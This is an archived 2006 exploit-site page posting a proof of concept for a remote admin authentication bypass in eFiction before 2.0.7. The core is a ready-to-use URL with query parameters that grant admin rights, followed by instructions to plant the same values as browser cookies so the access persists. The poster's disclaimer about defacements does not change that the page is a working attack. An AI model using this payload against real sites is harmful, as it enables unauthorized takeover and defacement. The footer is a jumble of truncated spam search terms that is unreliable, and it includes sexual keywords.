about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , eFiction < 2.0.7 Remote Admin Authentication Bypass Vulnerability



2006-08-25 eFiction < 2.0.7 Remote Admin Authentication Bypass Vulnerability
Rated as : High Risk

##########################################
# eFiction vulnerability
##########################################
# I am releasing this to the public. Vendor was notified. Someone is also
illegally defacing 
these websites under MY name, which is a shame because they ripped it from
a private discussion 
on g00ns.net. This proof of concept is not to be used to illegally hack
websites. I do not condone, 
nor act in this type of activity. I suggest whomever is defacing websites
under my name stop, 
since you would gain more notorioty under your own name.
##########################################

http://[target].com/efiction/index.php?adminloggedin=1&loggedin=1&level=1

Use firefox's extension "add n edit cookies" to add these to
your cookies so they stick. 
(ie: instead of $_GET['loggedin'] its $_COOKIE['loggedin'] which stays
with each page)


securitydot.net - 2006-08-25

Advertising

Copyright 2007, SecurityDot
Fri, 09 Jan 2009 22:57:52 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Joomla/com videoxxxxx scx SEX 89 Www.sexi.c p...ip/id. limit videoxxxxx News Searc free sex m THARUNAYA thrishboth Database B wwwsexe.co mambo Remo iChat Serv Indianz.co indian ful Www.Kajols Sexirani php-nuke 2 www.sex.co Crack Data Sex body www.simosc www.sexfre 4.5.7_rfi_ death not news for c pingword asian anal front page search/exp freepictur Sexso .co Doge sex Bangalores pictures o Crack Data Ztod.com Gambar cew Searching EQdkp 1.3. Www.Arabes www.dyslw. easynews.h sky portal Www.pinkwo Fedora Cor NOKIA 7610